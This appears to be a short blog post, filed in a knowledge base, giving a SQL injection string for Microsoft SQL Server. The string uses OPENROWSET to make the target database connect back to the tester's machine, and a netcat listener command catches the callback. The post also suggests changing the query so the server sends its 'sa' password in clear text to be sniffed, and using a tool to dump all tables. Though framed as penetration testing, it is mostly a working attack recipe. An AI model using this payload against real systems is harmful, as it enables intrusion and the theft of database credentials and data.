Pen test, SQL Injection

Here's the string you can drop in web form inputs to see if they're vulnerable to
SQL injection (on Microsoft SQL server anyway):

'; select * from OPENROWSET('SQLOLEDB','192.168.0.1';;,'select @@version')--

To verify results, replace the IP address w/ that of the machine you're testing from,
and use netcat (attached) to listen on port 1433 with the following syntax:

nc -vvv -l -p 1433

If the test is successful, you should see a connection and some garbage characters
in the netcat window.  This type of attack is particularly heinous to customers
running Microsoft SQL Server 7/2000.  If you replace the 'select @@version' with
another command, you can cause the remote database to try and connect using its
own 'sa' user and password in clear text and capture it with a sniffer.

IF you want to get REALLY tricky, download 'data thief v1.0' and dump all of their
tables in a handy GUI format.

http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
Dette indlæg blev udgivet i Knowledge Base, Old Base, SQL. Bogmærk permalinket.

Skriv et svar